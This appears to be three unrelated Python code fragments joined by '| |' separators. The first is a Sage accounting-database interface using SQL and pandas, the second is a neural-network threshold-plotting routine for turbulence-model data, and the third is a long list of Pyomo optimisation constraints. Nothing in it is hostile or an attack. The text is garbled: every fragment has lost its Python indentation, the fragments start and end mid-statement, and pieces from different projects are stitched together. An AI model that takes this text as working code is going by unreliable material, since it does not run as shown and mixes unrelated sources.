the maximum transaction is compared to the json file."""
connection_string = get_default_connection_string()
cnxn = pyodbc.connect(connection_string)
json_file_name = name + '.json'
if cache_upto_date: # read memoised data
try:
df = pd.read_json(json_file_name)
# Need to fix those records that are integer but normally stored as strings. On memoization theses are
# converted to integers so now need to be converted back to strings to be compatible
for fn in ['ACCOUNT_REF', 'INV_REF']:
df[fn] = df[fn].astype('str')
except (FileNotFoundError, ValueError): # Triggered as open nonexistent file is ok but no data
cache_upto_date = False
if not cache_upto_date: # May have been original but no data file
# Read fresh data from sage
df = pd.read_sql(sql, cnxn)
# Update files
df.to_json(json_file_name)
return df
sage_all_data = """
SELECT
aj.TRAN_NUMBER, aj.TYPE, aj.DATE, nl.ACCOUNT_REF, aj.ACCOUNT_REF as ALT_REF, aj.INV_REF, aj.DETAILS, AJ.TAX_CODE,
aj.AMOUNT, aj.FOREIGN_AMOUNT, aj.BANK_FLAG, ah.DATE_BANK_RECONCILED, aj.EXTRA_REF, aj.PAID_FLAG, ah.OUTSTANDING
FROM
NOMINAL_LEDGER nl, AUDIT_HEADER ah
LEFT OUTER JOIN AUDIT_JOURNAL aj ON nl.ACCOUNT_REF = aj.NOMINAL_CODE
WHERE
aj.HEADER_NUMBER = ah.HEADER_NUMBER AND
aj.DATE > '2000-01-01' AND aj.DELETED_FLAG = 0
"""
sage_all_invoice_lines = """
SELECT
INVOICE_NUMBER, ITEM_NUMBER, DESCRIPTION, TEXT, STOCK_CODE, COMMENT_1, COMMENT_2, UNIT_OF_SALE,
QUANTITY, UNIT_PRICE, DISCOUNT_AMOUNT, DISCOUNT_RATE, TAX_CODE, TAX_RATE,
NET_AMOUNT, TAX_AMOUNT, GROSS_AMOUNT
FROM
INVOICE_ITEM
"""
sage_all_invoices = """
SELECT
INVOICE_NUMBER, DEL_NAME, DEL_ADDRESS_1, DEL_ADDRESS_2, DEL_ADDRESS_3, DEL_ADDRESS_4, DEL_ADDRESS_5,
CARR_NET, CARR_TAX, CARR_GROSS, SETTLEMENT_DUE_DAYS, ORDER_NUMBER, CUST_ORDER_NUMBER
FROM
INVOICE
"""
class Singleton(type):
instance = None
def __call__(cls, *args, **kw):
if not cls.instance:
cls.instance = super(Singleton, cls).__call__(*args, **kw)
return cls.instance
class Sage(metaclass=Singleton):
"""Interface to SAGE line 50 account system.
"""
def __init__(self, connection_string=''):
""" If update_cache then make sure you keep updating from the database"""
load_dotenv(find_dotenv())
if connection_string == '':
connection_string = get_default_connection_string()
self.update_cache()
def update_cache(self):
self.load_data(update_cache=True)
def load_data(self, update_cache=False):
if not update_cache:
cache_is_upto_date = check_cache_upto_date()
else:
cache_is_upto_date = False
self.sqldata = get_dataframe_sage_odbc_query(sage_all_data, 'SageODBC', cache_is_upto_date)
if self.sqldata['DATE'].dtype == np.object:
self.sqldata['DATE'] = self.sqldata['DATE'].astype('datetime64')
self.invoices = get_dataframe_sage_odbc_query(sage_all_invoices, 'SageInvoices',
cache_is_upto_date)
self.invoice_lines = get_dataframe_sage_odbc_query(sage_all_invoice_lines, 'SageInvoiceLines',
cache_is_upto_date)
def using_reference_get(self, i, field, numchars=30, record_type = ['SI']):
"""
Using the invoice number we can look up the field. The accounting database contains line entries.
So this aggregates the line entries and returns the sum of the field if numeric.
"""
df = self.sqldata[(self.sqldata['TYPE'].isin(record_type))
& (self.sqldata['ACCOUNT_REF'] == '1100')
& (self.sqldata['INV_REF'] == str(i))
]
if len(df) == 0: # It is an error to look up data where there is none
raise PySageError('No data found in Audit Header to match invoice {}'.format(i))
elif field in ['TRAN_NUMBER']:
return list(df[:1][field])[0]
elif field in ['DATE', 'TYPE', 'ACCOUNT_REF', 'ALT_REF', 'INV_REF', 'TAX_CODE',
'BANK_FLAG', 'DATE_BANK_RECONCILED']:
return list(df[field])[0]
elif field in ['OUTSTANDING']:
return p(list(df[field])[0])
elif field in ['AMOUNT', 'FOREIGN_AMOUNT']:
return p(df[field].sum())
elif field == 'GROSS_AMOUNT':
return p(df['AMOUNT'].sum())
elif field in ['NET_AMOUNT']:
df2 = self.sqldata[(self.sqldata['TYPE'].isin(record_type))
& (self.sqldata['ACCOUNT_REF'] == '2200') # Get VAT control account
& (self.sqldata['INV_REF']== str(i))
]
return p(df['AMOUNT'].sum() + df2['AMOUNT'].sum())
elif field in ['TAX_AMOUNT']:
df2 = self.sqldata[(self.sqldata['TYPE'].isin(record_type))
& (self.sqldata['ACCOUNT_REF'] == '2200') # Get VAT control account
& (self.sqldata['INV_REF']== str(i))
]
return p(- df2['AMOUNT'].sum())
elif field in ['TAX_RATE']:
df2 = self.sqldata[(self.sqldata['TYPE'].isin(record_type))
& (self.sqldata['ACCOUNT_REF'] == '4000') # Get net Sales amount
& (self.sqldata['INV_REF']== str(i))
]
return 100 * ((float(df['AMOUNT'].sum()) / float(- df2['AMOUNT'].sum())) - 1.0)
elif field in ['DETAILS', 'EXTRA_REF']:
return df[field].str.cat()[:numchars]
else:
raise PySageError('Unmatched get field {} for using_invoice_get '.format(field))
def get_field(self, row, field):
""" For use in a lambda
lambda row: self.get_field(row,'This Field')
"""
result = None
if row['Member Code'] not in ('4552', '4424'): # TODO Ignore enrichment for AIS discount and AIS invoices
if row['Document Type'] in ('Invoice',):
result = self.using_reference_get(row['Your Ref'], field, record_type=['SI'])
if row['Document Type'] in ('Credit Note',):
try:
result = self.using_reference_get(row['Your Ref'], field, record_type=['SC'])
except PySageError: # Perhaps this is a credit note for an invoice because AIS stuffed up eg invoice
# 59088. So just see if it works as an invoice reference
result = self.using_reference_get(row['Your Ref'], field, record_type=['SI'])
return result
def enrich_remittance_doc(self, remittance_doc):
"""Enrich a raw remittance document with data from Sage
It uses getField which uses 3 predefined columns:
'Your Ref' is our invoice number
'Member Code' is an AIS specfic membership code and defines some exceptions
'Document Type' defines the type of document. We are only enriching 'Invoice' and 'Credit Note'
"""
def get_series(field):
return remittance_doc.df.apply(lambda row: self.get_field(row, field), axis=1)
remittance_doc.df['Account_Ref'] = get_series('ALT_REF')
remittance_doc.df['Sage_Net_Amount'] = get_series('NET_AMOUNT')
remittance_doc.df['Sage_Gross_Amount'] = get_series('GROSS_AMOUNT')
remittance_doc.df['Sage_VAT_Amount'] = get_series('TAX_AMOUNT')
remittance_doc.df['Sage_Tax_Rate'] = get_series('TAX_RATE') / 100
net = remittance_doc.df['Sage_Net_Amount'].sum()
vat = remittance_doc.df['Sage_VAT_Amount'].sum()
gross = remittance_doc.df['Sage_Gross_Amount'].sum()
# Check sage calculations - shouldn't be a problem. if this is passed can then rely on two of the
# three values to set the third. Note due to rounding you can't calculate them except approximately unless
# you have access to the line items.
if ( p(net + vat) != p(gross) ):
remittance_doc.checked = False
raise PySageError("Internal calcs of sum in Sage don't add up. net + vat != gross, {} + {} != {}".format(
net, vat, gross
))
# Check that gross AIS doc values match Sage gross values TODO remove specific for local installation
gross_sum_ex_discount = remittance_doc.df[remittance_doc.df['Member Code'] != '4552']['Sage_Gross_Amount'].sum()
if gross != gross_sum_ex_discount:
remittance_doc.checked = False
raise PySageError("Adding up total AIS invoices doesn't equal Sage sum, {} != {}, types {}, {}".format(
gross_sum_ex_discount, gross, type(gross_sum_ex_discount), type(gross)
))
# The internal sum has already been done. It is not until the next stage that we calculate discounts
def check_for_transactions_in_the_month(self, journal_type, account, date):
# c = 'Type of date {} account = {} Type of account {} journal type = {}'.format(type(date), account,
# type(account), journal_type)
# return (True, 0, c)
# d2 = pd.to_datetime(date, format='%d/%m/%Y')
# d2 = dt.datetime(2014,12,15)
en = date + pd.offsets.MonthEnd(0)
st = en - pd.offsets.MonthBegin(1)
test2 = self.sqldata[self.sqldata['ACCOUNT_REF'] == int(account)]
test1 = test2[test2['DATE'] >= st]
test = test1[test1['DATE'] <= en]
l = len(test)
if l == 0:
comment = 'Found no transactions from {} upto {}.'.format(
st.strftime('%Y-%m-%d'), en.strftime('%Y-%m-%d'), )
return (False, 0, comment)
else:
tn = test[:1]
# TODO make next a function and reuse below
comment = 'Found {} transactions from {} upto {}. First was on {}: details {}: for {}.'.format(
l, st.strftime('%Y-%m-%d'), en.strftime('%Y-%m-%d'),
list(tn['DATE'])[0].strftime('%Y-%m-%d'),
list(tn['DETAILS'])[0],
p(list(tn['AMOUNT'])[0]),)
return (True, 0, comment)
def detailed_check_for_transactions_in_the_month(self, journal_type, account, date, details):
en = date + pd.offsets.MonthEnd(0)
st = en - pd.offsets.MonthBegin(1)
test1 = self.sqldata[self.sqldata['ACCOUNT_REF'] == int(account)]
test2 = test1[test1['DATE'] >= st]
test3 = test2[test2['DATE'] <= en]
test = test3[test3['DETAILS'] == details] # Exact match is ok since looking for machine duplicates
l = len(test)
if l == 0:
comment = 'Found no transactions from {} upto {} .'.format(
st.strftime('%Y-%m-%d'), en.strftime('%Y-%m-%d'), )
return (False, 0, comment)
else:
| |
list(nn._feature_names)))
return unsafe
def calculate_thresh1(x, feature, target, debug=False):
try:
idx = target.index[target == 0][-1] #index of last zero
slope, intercept, r_value, p_value, std_err = stats.linregress(feature[(target.index > idx) & ~target.isnull()], target[(target.index > idx) & ~target.isnull()])
thresh_pred = x * slope + intercept
thresh1 = x[thresh_pred < 0][-1]
except (ValueError, IndexError):
thresh1 = np.NaN
if debug:
print('No threshold1')
return thresh1
def calculate_thresh2(feature, target, debug=False):
if len(target.shape) > 1:
raise NotImplementedError('2D threshold not implemented yet')
try:
idx = np.where(target == 0)[0][-1] #Only works for 1D
idx2 = np.where(~np.isnan(target[idx+1:]))[0][0] + idx + 1
#idx = np.arange(target.shape[0]),target.shape[1] - 1 - (target[:,::-1]==0).argmax(1) #Works for 2D
thresh2 = (feature[idx] + feature[idx2]) / 2
except IndexError:
thresh2 = np.NaN
if debug:
print('No threshold2')
return thresh2
#5.4 ms ± 115 µs per loop (mean ± std. dev. of 7 runs, 100 loops each) total
def process_chunk(target_names, chunck, settings=None, unsafe=False):
res = []
for ii, row in enumerate(chunck.iterrows()):
res.append(process_row(target_names, row, settings=settings, unsafe=unsafe))
return res
def process_row(target_names, row, ax1=None, unsafe=False, settings=None):
index, slice_ = row
feature = slice_.index.levels[1]
#target = slice.loc[target_names]
target = slice_.values[:len(feature) * len(target_names)].reshape(len(target_names), len(feature))
if np.all(np.logical_or(target == 0, np.isnan(target))):
return (1,)
else:
# 156 µs ± 10.4 µs per loop (mean ± std. dev. of 7 runs, 10000 loops each) (no zerocolors)
thresh_nn = np.empty(len(target_names) * len(nns))
thresh_nn_i = np.empty_like(thresh_nn, dtype='int64')
popbacks = np.empty_like(thresh_nn)
thresh1_misses = np.empty_like(thresh_nn)
thresh2_misses = np.empty_like(thresh_nn)
if settings['plot_zerocolors']:
maxgam = slice_['maxgam']
# Create slice, assume sorted
# 14.8 µs ± 1.27 µs per loop (mean ± std. dev. of 7 runs, 100000 loops each)
x = np.linspace(feature.values[0],
feature.values[-1],
200)
#if plot:
if not ax1 and settings['plot']:
fig = plt.figure()
if settings['plot_pop'] and settings['plot_slice']:
gs = gridspec.GridSpec(2, 2, height_ratios=[10, 1], width_ratios=[5,1],
left=0.05, right=0.95, wspace=0.05, hspace=0.05)
ax2 = plt.subplot(gs[1,0])
ax3 = plt.subplot(gs[0,1])
if not settings['plot_pop'] and settings['plot_slice']:
gs = gridspec.GridSpec(2, 1, height_ratios=[10, 2], width_ratios=[1],
left=0.05, right=0.95, wspace=0.05, hspace=0.05)
ax2 = plt.subplot(gs[1,0])
if not settings['plot_pop'] and not settings['plot_slice']:
gs = gridspec.GridSpec(1, 1, height_ratios=[1], width_ratios=[1],
left=0.05, right=0.95, wspace=0.05, hspace=0.05)
ax1 = plt.subplot(gs[0,0])
#ax1.set_prop_cycle(cycler('color', ['#f1eef6','#d7b5d8','#df65b0','#dd1c77','#980043']))
# http://tristen.ca/hcl-picker/#/clh/5/273/2A0A75/D59FEB
#ax1.set_prop_cycle(cycler('color', ['#2A0A75','#6330B8','#9F63E2','#D59FEB']))
if len(nns) == 1:
color_range = np.array([.7])
else:
color_range = np.linspace(0, 0.9, len(nns))
ax1.set_prop_cycle(cycler('color', plt.cm.plasma(color_range)))
ax1.set_xlabel(nameconvert[slicedim])
ax1.set_ylabel(nameconvert[list(nns.items())[0][1]._target_names[0]])
if settings['calc_thresh1']:
thresh1 = calculate_thresh1(x, feature, target, debug=settings['debug'])
print('whyyy?')
# 12.5 µs ± 970 ns per loop (mean ± std. dev. of 7 runs, 100000 loops each)
if all(['ef' in name for name in target_names]):
thresh2 = calculate_thresh2(feature.values, target[0,:], debug=settings['debug'])
elif all(['pf' in name for name in target_names]):
thresh2 = calculate_thresh2(feature.values, np.abs(target[0,:]), debug=settings['debug'])
else:
thresh2 = np.nan
print('No thresh2!')
embed()
print('Weird stuff')
if settings['plot'] and settings['plot_threshlines']:
ax1.axvline(thresh2, c='black', linestyle='dashed')
if settings['plot'] and settings['plot_threshslope']:
if ~np.isnan(thresh2):
pre_thresh = x[x <= thresh2]
ax1.plot(pre_thresh, np.zeros_like(pre_thresh), c='gray', linestyle='dashed')
post_thresh = x[x > thresh2]
se = slice_.loc[target_names]
se.index = se.index.droplevel()
se = se.loc[se.index > thresh2].dropna()
a = sc.optimize.curve_fit(lambda x, a: a * x, se.index-thresh2, se.values)[0][0]
ax1.plot(post_thresh, a * (post_thresh-thresh2), c='gray', linestyle='dashed')
# 13.7 µs ± 1.1 µs per loop (mean ± std. dev. of 7 runs, 100000 loops each)
if unsafe:
slice_list = [np.full_like(x, val) for val in index]
slicedim_idx = np.nonzero(list(nns.values())[0]._feature_names.values == slicedim)[0][0]
slice_list.insert(slicedim_idx, x)
else:
slice_dict = {name: np.full_like(x, val) for name, val in zip(df.index.names, index)}
slice_dict[slicedim] = x
# Plot target points
if settings['plot'] and settings['plot_slice']:
table = ax2.table(cellText=[[nameconvert[name] for name in df.index.names],
['{:.2f}'.format(xx) for xx in index]],cellLoc='center')
table.auto_set_font_size(False)
table.scale(1, 1.5)
#table.set_fontsize(20)
ax2.axis('tight')
ax2.axis('off')
#fig.subplots_adjust(bottom=0.2, transform=ax1.transAxes)
# Plot nn lines
nn_preds = np.ndarray([x.shape[0], 0])
for ii, (nn_index, nn) in enumerate(nns.items()):
if all(['ef' in name for name in nn._target_names]):
clip_low = True
low_bound = np.zeros((len(nn._target_names), 1))
#high_bound = np.full((len(nn._target_names), 1), np.inf)
clip_high = False
high_bound = None
elif all(['pf' in name for name in nn._target_names]):
#raise NotImplementedError('Particle bounds')
clip_low = False
low_bound = np.full((len(nn._target_names), 1), -80)
clip_high = False
high_bound = np.full((len(nn._target_names), 1), 80)
else:
clip_low = False
low_bound = None
clip_high = False
high_bound = None
print('Mixed target!')
embed()
print('Weird stuff')
if unsafe:
nn_pred = nn.get_output(np.array(slice_list).T, clip_low=clip_low, low_bound=low_bound, clip_high=clip_high, high_bound=high_bound, safe=not unsafe, output_pandas=False)
else:
nn_pred = nn.get_output(pd.DataFrame(slice_dict), clip_low=clip_low, low_bound=low_bound, clip_high=clip_high, high_bound=high_bound, safe=not unsafe, output_pandas=True).values
nn_preds = np.concatenate([nn_preds, nn_pred], axis=1)
if settings['plot'] and settings['plot_nns']:
lines = []
if style == 'duo':
labels = np.repeat([nn.label for nn in nns.values()], 2)
for ii in range(0, nn_preds.shape[1], 2):
lines.append(ax1.plot(x, nn_preds[:, ii], label=labels[ii])[0])
lines.append(ax1.plot(x, nn_preds[:, ii+1], label=labels[ii+1], c=lines[-1].get_color(), linestyle='dashed')[0])
else:
for ii, (nn, row) in enumerate(zip(nns.values(), nn_preds.T)):
pass
lines.append(ax1.plot(x, row, label=nn.label)[0])
matrix_style = False
if matrix_style:
thresh_i = (np.arange(nn_preds.shape[1]),nn_preds.shape[0] - 1 - (nn_preds[::-1,:]==0).argmax(0))[1]
thresh = x[thresh_i]
thresh[thresh == x[-1]] = np.nan
else:
for ii, row in enumerate(nn_preds.T):
try:
if row[-1] == 0:
thresh_nn[ii] = np.nan
else:
thresh_i = thresh_nn_i[ii] = np.where(np.diff(np.sign(row)))[0][-1]
thresh_nn[ii] = x[thresh_i]
except IndexError:
thresh_nn[ii] = np.nan
if settings['plot'] and settings['plot_threshlines']:
for ii, row in enumerate(thresh_nn):
ax1.axvline(row, c=lines[ii].get_color(), linestyle='dotted')
if settings['debug']:
print('network ', ii, 'threshold ', row)
if matrix_style:
masked = np.ma.masked_where(x[:, np.newaxis] > thresh, nn_preds)
#popback_i = (masked.shape[0] - 1 - (masked[::1,:]!=0)).argmax(0)
popback_i = masked.shape[0] - 1 - (masked.shape[0] - 1 - (masked[::-1,:]!=0)).argmin(0)
popback = x[popback_i]
popback[popback == x[-1]] = np.nan
else:
for ii, row in enumerate(nn_preds.T):
if not np.isnan(thresh_nn[ii]):
try:
popback_i = np.flatnonzero(row[:thresh_nn_i[ii]])
popbacks[ii] = x[popback_i[-1]]
except (IndexError):
popbacks[ii] = np.nan
else:
popbacks[ii] = np.nan
# 5.16 µs ± 188 ns per loop (mean ± std. dev. of 7 runs, 100000 loops each)
wobble = np.abs(np.diff(nn_preds, n=2,axis=0))
wobble_unstab = np.array([np.mean(col[ind:]) for ind, col in zip(thresh_nn_i + 1, wobble.T)])
wobble_tot = np.mean(wobble, axis=0)
if settings['plot'] and settings['plot_pop']:
thresh2_misses = thresh_nn - thresh2
thresh2_popback = popbacks - thresh2
slice_stats = np.array([thresh2_misses, thresh2_popback, np.log10(wobble_tot), np.log10(wobble_unstab)]).T
slice_strings = np.array(['{:.1f}'.format(xx) for xx in slice_stats.reshape(slice_stats.size)])
slice_strings = slice_strings.reshape(slice_stats.shape)
slice_strings = np.insert(slice_strings, 0, ['thre_mis', 'pop_mis', 'wobble_tot', 'wobble_unstb'], axis=0)
table = ax3.table(cellText=slice_strings, loc='center')
table.auto_set_font_size(False)
ax3.axis('tight')
ax3.axis('off')
if settings['debug']:
print(slice_stats.flatten())
if settings['plot']:
if settings['plot_zerocolors']:
color = target.copy()
color[(target == 0) & (maxgam == 0)] = 'green'
color[(target != 0) & (maxgam == 0)] = 'red'
color[(target == 0) & (maxgam != 0)] = 'magenta'
color[(target != 0) & (maxgam != 0)] = 'blue'
else:
color='blue'
if settings['hide_qualikiz']:
color='white'
zorder=1
label=''
else:
zorder=1000
label = 'QuaLiKiz'
#label = 'Turbulence model'
#label=''
markers = ['x', '+']
for column, marker in zip(target, markers):
ax1.scatter(feature[column != 0],
column[column != 0], c=color, label=label, marker=marker, zorder=zorder)
ax1.scatter(feature[column==0],
column[column==0], edgecolors=color, marker='o', facecolors='none', zorder=zorder)
# Plot regression
if settings['plot'] and settings['plot_thresh1line'] and not np.isnan(thresh1):
#plot_min = ax1.get_ylim()[0]
plot_min = -0.1
x_plot = x[(thresh_pred > plot_min) & (thresh_pred < ax1.get_ylim()[1])]
y_plot = thresh_pred[(thresh_pred > plot_min) & (thresh_pred < ax1.get_ylim()[1])]
ax1.plot(x_plot, y_plot, c='gray', linestyle='dotted')
ax1.plot(x[x< thresh1], np.zeros_like(x[x< thresh1]), c='gray', linestyle='dotted')
#ax1.axvline(thresh1, c='black', linestyle='dotted')
slice_res = np.array([thresh_nn, popbacks, wobble_tot, wobble_unstab]).T
if settings['plot']:
ax1.legend()
ax1.set_ylim(bottom=min(ax1.get_ylim()[0], 0))
plt.show()
fig.savefig('slice.pdf', format='pdf', bbox_inches='tight')
qlk_data = pd.DataFrame(target.T, columns=target_names, index=feature)
cols = pd.MultiIndex.from_product([[nn.label for nn in nns.values()], target_names])
nn_data = pd.DataFrame(nn_preds, columns=cols)
nn_data.index = x
nn_data.index.name = feature.name
slice_data = pd.Series(dict(zip(df.index.names, index)))
slice_latex = (' {!s} &' * len(df.index.names)).format(*[nameconvert[name] for name in df.index.names]).strip(' &')
slice_latex += ('\\\\\n' + ' {:.2f} &' * len(index)).format(*index).strip(' &')
embed()
plt.close(fig)
return (0, thresh2, slice_res.flatten())
#sliced += 1
#if sliced % 1000 == 0:
# print(sliced, 'took ', time.time() - starttime, ' seconds')
def extract_stats(totstats, style):
df = totstats.copy()
df = df.reorder_levels([2,0,1], axis=1)
results = pd.DataFrame()
for relabs, measure in zip(['rel', 'abs'], ['thresh', 'pop']):
df2 = df[measure]
qlk_data = df2['QLK']
network_data = df2.drop('QLK', axis=1)
if relabs == 'rel':
mis = network_data.subtract(qlk_data, level=1).divide(qlk_data, level=1)
elif relabs == 'abs':
mis = network_data.subtract(qlk_data, level=1)
quant1 = 0.025
quant2 = 1 - quant1
quant = mis.quantile([quant1, quant2])
results['_'.join([measure, relabs, 'mis', 'median'])] = mis.median()
results['_'.join([measure, relabs, 'mis', '95width'])] = quant.loc[quant2] - quant.loc[quant1]
results['_'.join(['no', measure, 'frac'])] = mis.isnull().sum() / len(mis)
results['wobble_unstab'] = df['wobble_unstab'].mean()
results['wobble_tot'] = df['wobble_tot'].mean()
if style == 'duo':
duo_results = pd.DataFrame()
measure = 'thresh'
df2 = df[measure]
network_data = df2.drop('QLK', axis=1)
network_data = network_data.reorder_levels([1, 0], axis=1)
efelike_name = network_data.columns[1][0]
efilike_name = network_data.columns[0][0]
mis = network_data[efilike_name] - network_data[efelike_name]
quant = mis.quantile([quant1, quant2])
duo_results['dual_thresh_mismatch_median'] = mis.median()
duo_results['dual_thresh_mismatch_95width'] = quant.loc[quant2] - quant.loc[quant1]
duo_results['no_dual_thresh_frac'] = mis.isnull().sum() / len(mis)
else:
duo_results = pd.DataFrame()
return results, duo_results
def extract_nn_stats(results, duo_results, nns, frac, submit_to_nndb=False):
db.connect()
| |
= Constraint(expr=-m.x2502*m.x1016 + m.x1767 == 0)
m.c1901 = Constraint(expr=-m.x2502*m.x1021 + m.x1772 == 0)
m.c1902 = Constraint(expr=-m.x2502*m.x1026 + m.x1777 == 0)
m.c1903 = Constraint(expr=-m.x2502*m.x1031 + m.x1782 == 0)
m.c1904 = Constraint(expr=-m.x2502*m.x1036 + m.x1787 == 0)
m.c1905 = Constraint(expr=-m.x2502*m.x1041 + m.x1792 == 0)
m.c1906 = Constraint(expr=-m.x2502*m.x1046 + m.x1797 == 0)
m.c1907 = Constraint(expr=-m.x2502*m.x1051 + m.x1802 == 0)
m.c1908 = Constraint(expr=-m.x2502*m.x1056 + m.x1807 == 0)
m.c1909 = Constraint(expr=-m.x2502*m.x1061 + m.x1812 == 0)
m.c1910 = Constraint(expr=-m.x2502*m.x1066 + m.x1817 == 0)
m.c1911 = Constraint(expr=-m.x2502*m.x1071 + m.x1822 == 0)
m.c1912 = Constraint(expr=-m.x2502*m.x1076 + m.x1827 == 0)
m.c1913 = Constraint(expr=-m.x2502*m.x1081 + m.x1832 == 0)
m.c1914 = Constraint(expr=-m.x2502*m.x1086 + m.x1837 == 0)
m.c1915 = Constraint(expr=-m.x2502*m.x1091 + m.x1842 == 0)
m.c1916 = Constraint(expr=-m.x2502*m.x1096 + m.x1847 == 0)
m.c1917 = Constraint(expr=-m.x2502*m.x1101 + m.x1852 == 0)
m.c1918 = Constraint(expr=-m.x2502*m.x1106 + m.x1857 == 0)
m.c1919 = Constraint(expr=-m.x2502*m.x1111 + m.x1862 == 0)
m.c1920 = Constraint(expr=-m.x2502*m.x1116 + m.x1867 == 0)
m.c1921 = Constraint(expr=-m.x2502*m.x1121 + m.x1872 == 0)
m.c1922 = Constraint(expr=-m.x2502*m.x1126 + m.x1877 == 0)
m.c1923 = Constraint(expr=-m.x2502*m.x1131 + m.x1882 == 0)
m.c1924 = Constraint(expr=-m.x2502*m.x1136 + m.x1887 == 0)
m.c1925 = Constraint(expr=-m.x2502*m.x1141 + m.x1892 == 0)
m.c1926 = Constraint(expr=-m.x2502*m.x1146 + m.x1897 == 0)
m.c1927 = Constraint(expr=-m.x2502*m.x1151 + m.x1902 == 0)
m.c1928 = Constraint(expr=-m.x2502*m.x1156 + m.x1907 == 0)
m.c1929 = Constraint(expr=-m.x2502*m.x1161 + m.x1912 == 0)
m.c1930 = Constraint(expr=-m.x2502*m.x1166 + m.x1917 == 0)
m.c1931 = Constraint(expr=-m.x2502*m.x1171 + m.x1922 == 0)
m.c1932 = Constraint(expr=-m.x2502*m.x1176 + m.x1927 == 0)
m.c1933 = Constraint(expr=-m.x2502*m.x1181 + m.x1932 == 0)
m.c1934 = Constraint(expr=-m.x2502*m.x1186 + m.x1937 == 0)
m.c1935 = Constraint(expr=-m.x2502*m.x1191 + m.x1942 == 0)
m.c1936 = Constraint(expr=-m.x2502*m.x1196 + m.x1947 == 0)
m.c1937 = Constraint(expr=-m.x2502*m.x1201 + m.x1952 == 0)
m.c1938 = Constraint(expr=-m.x2502*m.x1206 + m.x1957 == 0)
m.c1939 = Constraint(expr=-m.x2502*m.x1211 + m.x1962 == 0)
m.c1940 = Constraint(expr=-m.x2502*m.x1216 + m.x1967 == 0)
m.c1941 = Constraint(expr=-m.x2502*m.x1221 + m.x1972 == 0)
m.c1942 = Constraint(expr=-m.x2502*m.x1226 + m.x1977 == 0)
m.c1943 = Constraint(expr=-m.x2502*m.x1231 + m.x1982 == 0)
m.c1944 = Constraint(expr=-m.x2502*m.x1236 + m.x1987 == 0)
m.c1945 = Constraint(expr=-m.x2502*m.x1241 + m.x1992 == 0)
m.c1946 = Constraint(expr=-m.x2502*m.x1246 + m.x1997 == 0)
m.c1947 = Constraint(expr=-m.x2502*m.x1251 + m.x2002 == 0)
m.c1948 = Constraint(expr=-m.x2502*m.x1256 + m.x2007 == 0)
m.c1949 = Constraint(expr=-m.x2502*m.x1261 + m.x2012 == 0)
m.c1950 = Constraint(expr=-m.x2502*m.x1266 + m.x2017 == 0)
m.c1951 = Constraint(expr=-m.x2502*m.x1271 + m.x2022 == 0)
m.c1952 = Constraint(expr=-m.x2502*m.x1276 + m.x2027 == 0)
m.c1953 = Constraint(expr=-m.x2502*m.x1281 + m.x2032 == 0)
m.c1954 = Constraint(expr=-m.x2502*m.x1286 + m.x2037 == 0)
m.c1955 = Constraint(expr=-m.x2502*m.x1291 + m.x2042 == 0)
m.c1956 = Constraint(expr=-m.x2502*m.x1296 + m.x2047 == 0)
m.c1957 = Constraint(expr=-m.x2502*m.x1301 + m.x2052 == 0)
m.c1958 = Constraint(expr=-m.x2502*m.x1306 + m.x2057 == 0)
m.c1959 = Constraint(expr=-m.x2502*m.x1311 + m.x2062 == 0)
m.c1960 = Constraint(expr=-m.x2502*m.x1316 + m.x2067 == 0)
m.c1961 = Constraint(expr=-m.x2502*m.x1321 + m.x2072 == 0)
m.c1962 = Constraint(expr=-m.x2502*m.x1326 + m.x2077 == 0)
m.c1963 = Constraint(expr=-m.x2502*m.x1331 + m.x2082 == 0)
m.c1964 = Constraint(expr=-m.x2502*m.x1336 + m.x2087 == 0)
m.c1965 = Constraint(expr=-m.x2502*m.x1341 + m.x2092 == 0)
m.c1966 = Constraint(expr=-m.x2502*m.x1346 + m.x2097 == 0)
m.c1967 = Constraint(expr=-m.x2502*m.x1351 + m.x2102 == 0)
m.c1968 = Constraint(expr=-m.x2502*m.x1356 + m.x2107 == 0)
m.c1969 = Constraint(expr=-m.x2502*m.x1361 + m.x2112 == 0)
m.c1970 = Constraint(expr=-m.x2502*m.x1366 + m.x2117 == 0)
m.c1971 = Constraint(expr=-m.x2502*m.x1371 + m.x2122 == 0)
m.c1972 = Constraint(expr=-m.x2502*m.x1376 + m.x2127 == 0)
m.c1973 = Constraint(expr=-m.x2502*m.x1381 + m.x2132 == 0)
m.c1974 = Constraint(expr=-m.x2502*m.x1386 + m.x2137 == 0)
m.c1975 = Constraint(expr=-m.x2502*m.x1391 + m.x2142 == 0)
m.c1976 = Constraint(expr=-m.x2502*m.x1396 + m.x2147 == 0)
m.c1977 = Constraint(expr=-m.x2502*m.x1401 + m.x2152 == 0)
m.c1978 = Constraint(expr=-m.x2502*m.x1406 + m.x2157 == 0)
m.c1979 = Constraint(expr=-m.x2502*m.x1411 + m.x2162 == 0)
m.c1980 = Constraint(expr=-m.x2502*m.x1416 + m.x2167 == 0)
m.c1981 = Constraint(expr=-m.x2502*m.x1421 + m.x2172 == 0)
m.c1982 = Constraint(expr=-m.x2502*m.x1426 + m.x2177 == 0)
m.c1983 = Constraint(expr=-m.x2502*m.x1431 + m.x2182 == 0)
m.c1984 = Constraint(expr=-m.x2502*m.x1436 + m.x2187 == 0)
m.c1985 = Constraint(expr=-m.x2502*m.x1441 + m.x2192 == 0)
m.c1986 = Constraint(expr=-m.x2502*m.x1446 + m.x2197 == 0)
m.c1987 = Constraint(expr=-m.x2502*m.x1451 + m.x2202 == 0)
m.c1988 = Constraint(expr=-m.x2502*m.x1456 + m.x2207 == 0)
m.c1989 = Constraint(expr=-m.x2502*m.x1461 + m.x2212 == 0)
m.c1990 = Constraint(expr=-m.x2502*m.x1466 + m.x2217 == 0)
m.c1991 = Constraint(expr=-m.x2502*m.x1471 + m.x2222 == 0)
m.c1992 = Constraint(expr=-m.x2502*m.x1476 + m.x2227 == 0)
m.c1993 = Constraint(expr=-m.x2502*m.x1481 + m.x2232 == 0)
m.c1994 = Constraint(expr=-m.x2502*m.x1486 + m.x2237 == 0)
m.c1995 = Constraint(expr=-m.x2502*m.x1491 + m.x2242 == 0)
m.c1996 = Constraint(expr=-m.x2502*m.x1496 + m.x2247 == 0)
m.c1997 = Constraint(expr=-m.x2502*m.x1501 + m.x2252 == 0)
m.c1998 = Constraint(expr=-m.x2502*m.x1506 + m.x2257 == 0)
m.c1999 = Constraint(expr=-m.x2502*m.x1511 + m.x2262 == 0)
m.c2000 = Constraint(expr=-m.x2502*m.x1516 + m.x2267 == 0)
m.c2001 = Constraint(expr=-m.x2502*m.x1521 + m.x2272 == 0)
m.c2002 = Constraint(expr=-m.x2502*m.x1526 + m.x2277 == 0)
